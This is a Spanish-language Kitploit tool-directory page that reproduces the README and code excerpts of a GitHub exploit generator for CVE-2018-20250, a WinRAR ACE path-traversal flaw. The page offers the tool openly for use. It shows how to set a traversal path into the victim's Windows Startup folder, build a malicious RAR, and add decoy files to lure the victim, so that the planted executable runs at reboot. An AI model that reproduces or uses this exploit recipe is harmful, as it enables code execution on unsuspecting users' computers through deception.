Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-20250 — Genera automáticamente archivos RAR maliciosos para explotar CVE-2018-20250 y lograr ejecución de código mediante el path traversal de ACE en WinRAR. | Kitploit
Herramientas/GitHubGitHub/aeolustf/cve-2018-20250
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubaeolustf/cve-2018-20250

CVE-2018-20250

Genera automáticamente archivos RAR maliciosos para explotar CVE-2018-20250 y lograr ejecución de código mediante el path traversal de ACE en WinRAR.

Ver Repositorio
1hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

exp para Extraer Ejecución de Código de Winrar

poc por Ridter

¿cómo usarlo?

solo necesitas instalar python 3.7, y preparar un archivo malicioso que quieras ejecutar, establecer los valores que desees, ¡este script exp generará el archivo malicioso automáticamente!

  1. establece los valores que desees
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

  1. ejecuta el exp, el exp genera el test.rar automáticamente

  1. si la víctima abre el test.rar, verá los archivos hello.txt y world.txt, también puedes agregar más archivos, más atractivos.

  1. cuando descomprima el archivo, el directorio de inicio del usuario de la víctima tendrá un archivo más llamado hi.exe, que en realidad es un calc.exe. cuando reinicie el ordenador, el hi.exe se ejecutará.

¡diviértete! :)

Descargar herramienta